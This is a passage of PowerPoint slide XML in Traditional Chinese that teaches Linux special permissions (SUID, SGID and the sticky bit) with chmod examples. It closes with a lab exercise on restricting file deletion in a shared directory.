              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>內新增、修改檔案，但僅有該檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄建立者與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>能夠刪除自己的目錄或檔案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檔案目錄特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限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2577960" y="4444920"/>
              <a:ext cx="1219680" cy="1530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62120" y="4381560"/>
                <a:ext cx="1251360" cy="27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6000840" y="5035680"/>
              <a:ext cx="95400" cy="64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85000" y="4971960"/>
                <a:ext cx="1270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6000840" y="4876920"/>
              <a:ext cx="159120" cy="2671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985000" y="4813200"/>
                <a:ext cx="190800" cy="39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206880" y="2139840"/>
              <a:ext cx="476640" cy="194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191040" y="2076480"/>
                <a:ext cx="508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581800" y="2076480"/>
              <a:ext cx="2426040" cy="637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565600" y="2013120"/>
                <a:ext cx="245808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4343400" y="2622600"/>
              <a:ext cx="1238760" cy="108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327560" y="2558880"/>
                <a:ext cx="1270440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6248520" y="2597040"/>
              <a:ext cx="654120" cy="957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232680" y="2533680"/>
                <a:ext cx="68616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464000" y="3968640"/>
              <a:ext cx="1086120" cy="68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448160" y="3905280"/>
                <a:ext cx="11178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3219480" y="3524400"/>
              <a:ext cx="4254840" cy="12708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203640" y="3460680"/>
                <a:ext cx="428652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7880400" y="3670200"/>
              <a:ext cx="41292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864560" y="3606840"/>
                <a:ext cx="4446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1644480" y="3987720"/>
              <a:ext cx="394200" cy="68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628640" y="3924360"/>
                <a:ext cx="4258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2577960" y="3949560"/>
              <a:ext cx="2788200" cy="1400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562120" y="3886200"/>
                <a:ext cx="281988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5353200" y="3975120"/>
              <a:ext cx="984600" cy="446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337000" y="3911760"/>
                <a:ext cx="101664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2025720" y="2139840"/>
              <a:ext cx="2229120" cy="8928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009880" y="2076480"/>
                <a:ext cx="2260800" cy="21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4641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/>
              <a:t>Sticky Bit (SBIT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>因</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>兩個目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>開放供所有使用者暫時存放檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>亦即每位使用者皆擁有完整的權限進入該目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>去瀏覽、刪除與移動檔案。假使碰到某位使用者存心搞鬼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>恣意亂刪其他使用者放置的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>暫存目錄將形同危險地帶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>造成沒有任何使用者能夠安心利用這些目錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>因此我們可以把暫存目錄的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>權限打開</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>則存放在該目錄的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>僅准許其擁有者去刪除與搬移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>避免不守法的使用者無故騷擾。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="28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檔案目錄特殊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490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6824"/>
            <a:ext cx="8229600" cy="5402535"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>特殊權限的設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>僅對目錄有效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。若需要設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>某個檔案具有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>必須</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將檔案放在具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>權限的目錄下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>才能讓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>權限產生效用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>空權限 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SGID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky 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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 7666(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設定如下圖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發</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>權限 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SGID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>佔用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的位置來表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>假設同時開啟執行權限和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SGID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sticky, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>則其權限標示型態如下：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檔案目錄特殊權限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863" y="5877272"/>
            <a:ext cx="7518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137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/>
              <a:t>SUID/SGID/SBIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>的屬性同樣是用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>設定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 smtClean="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>設定：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>SUID = 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>SGID = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>SBIT = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>SUID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>4755 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>man.config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>SGID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>2755 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>man.config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>SBIT: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> 1755 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="32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檔案目錄特殊權限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33480" y="1587600"/>
              <a:ext cx="5791680" cy="2289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17640" y="1523880"/>
                <a:ext cx="582336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-6480" y="2000160"/>
              <a:ext cx="1943640" cy="3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22320" y="1936800"/>
                <a:ext cx="19753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1003320" y="2584440"/>
              <a:ext cx="1441800" cy="957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87480" y="2521080"/>
                <a:ext cx="147348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825480" y="2603520"/>
              <a:ext cx="8973000" cy="42483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09640" y="2540160"/>
                <a:ext cx="9004680" cy="437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2616120" y="3213000"/>
              <a:ext cx="171720" cy="194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600280" y="3149640"/>
                <a:ext cx="2037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746520" y="4730760"/>
              <a:ext cx="108360" cy="129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730680" y="4667400"/>
                <a:ext cx="1400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784680" y="5181480"/>
              <a:ext cx="127440" cy="324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768840" y="5118120"/>
                <a:ext cx="15912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3753000" y="5607000"/>
              <a:ext cx="152640" cy="259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736800" y="5543640"/>
                <a:ext cx="1846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489040" y="3645000"/>
              <a:ext cx="228960" cy="320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473200" y="3581280"/>
                <a:ext cx="2610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444760" y="4152960"/>
              <a:ext cx="343080" cy="385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428920" y="4089240"/>
                <a:ext cx="375120" cy="165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553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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>跟目錄下建立一個目錄為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>’CUR’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>CUR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>目錄下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>包含目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>權限設為全開。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>新增兩個使用者為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>sy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>gy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，分別以使用者進入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>’CUR’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>目錄下。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>sy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>使用者新增檔案為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>’s1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>’s2’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，只允許檔案擁有者或管理者刪除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>’s1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>檔案，其他人不允許刪除。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>gy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>使用者新增檔案為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>’g1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>’g2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>，只允許檔案擁有者或管理者刪除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>’g1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>檔案，其他人不允許刪除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean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292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內容版面配置區 1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15616" y="1196751"/>
            <a:ext cx="7344816" cy="5409115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>樹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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2076480" y="5162400"/>
              <a:ext cx="36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60640" y="5099040"/>
                <a:ext cx="320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" name="筆跡 1"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2133720" y="2038320"/>
              <a:ext cx="590760" cy="82800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="筆跡 1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117880" y="1974960"/>
                <a:ext cx="62244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" name="筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2209680" y="3505320"/>
              <a:ext cx="705240" cy="320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193840" y="3441600"/>
                <a:ext cx="73692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6" name="筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2235240" y="2660760"/>
              <a:ext cx="622800" cy="64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219400" y="2597040"/>
                <a:ext cx="6544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7" name="筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2273400" y="4070520"/>
              <a:ext cx="546480" cy="25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257560" y="4006800"/>
                <a:ext cx="5781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8" name="筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2120760" y="4343400"/>
              <a:ext cx="711720" cy="38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104920" y="4280040"/>
                <a:ext cx="7434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9" name="筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2254320" y="5556240"/>
              <a:ext cx="698760" cy="450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2238480" y="5492880"/>
                <a:ext cx="73044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0" name="筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2336760" y="6070680"/>
              <a:ext cx="53388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2320920" y="6006960"/>
                <a:ext cx="5655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1" name="筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2241720" y="6362640"/>
              <a:ext cx="597240" cy="576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2225520" y="6299280"/>
                <a:ext cx="6292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2" name="筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2374920" y="2038320"/>
              <a:ext cx="444960" cy="320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359080" y="1974960"/>
                <a:ext cx="4766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4" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2273400" y="1720800"/>
              <a:ext cx="698760" cy="385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257560" y="1657440"/>
                <a:ext cx="7304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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2260440" y="2362320"/>
              <a:ext cx="819720" cy="320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2244600" y="2298600"/>
                <a:ext cx="8514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17" name="筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1282680" y="2641680"/>
              <a:ext cx="533880" cy="3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266840" y="2577960"/>
                <a:ext cx="56556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2494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在安裝 </a:t>
            </a:r>
            <a:r>
